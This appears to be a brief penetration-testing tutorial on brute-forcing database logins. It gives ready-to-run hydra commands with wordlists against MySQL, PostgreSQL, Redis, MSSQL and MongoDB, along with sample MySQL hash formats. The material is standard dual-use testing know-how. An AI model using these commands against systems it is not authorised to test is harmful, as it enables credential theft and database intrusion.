Today in this tutorial we will learn how to brute force Database services passwords, when testing on live environments be cautious or you will trigger a mysql ddos into the service.

Attack and Penetration Testing of Database Services

Brute force databases services can be one of the most simple attacks to do but can have a huge impact on the business. Mitigate this kind of attacks is crucial to any security team when installing a mysql server always keep in mind the best security practices

Mysql Paswords

Mysql password can have different hash types, hydra can detect them automatically, mysql service run on port 3306/TCP.

MySQL Old Hash

Length: 8 bytes

Hash Example: 706317496665abbb

MySql New Hash

Length: 20 bytes

Hash Example: *E6CC90B878B948C3510F5433C792C46C58C4AF40

hydra -L usernames.txt -P pass.txt <IP> mysql

Hydra Parameters

  • -L -> List of usernames to test
  • -P -> Wordlist of passwords to test
  • mysql -> define the service type into hydra

PostgresSQL Passwords

Port: 5432/TCP

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres

Redis Passwords

hydra –P /path/pass.txt redis://<IP>:<PORT>

MSSQL Passwords

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql

  1. How to Brute Force MySQL Passwords?

    hydra -L usernames.txt -P pass.txt <IP> mysql

  2. How to Brute Force MSSQL Passwords?

    hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql

  3. How to Brute Force Redis Passwords?

    hydra –P /path/pass.txt redis://<IP>:<PORT>

  4. How to Brute Force Postgres Passwords?

    hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres

  5. How to Brute Force MongoDB Passwords?

    hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mongodb

Databases Penetration Testing, Penetration Testing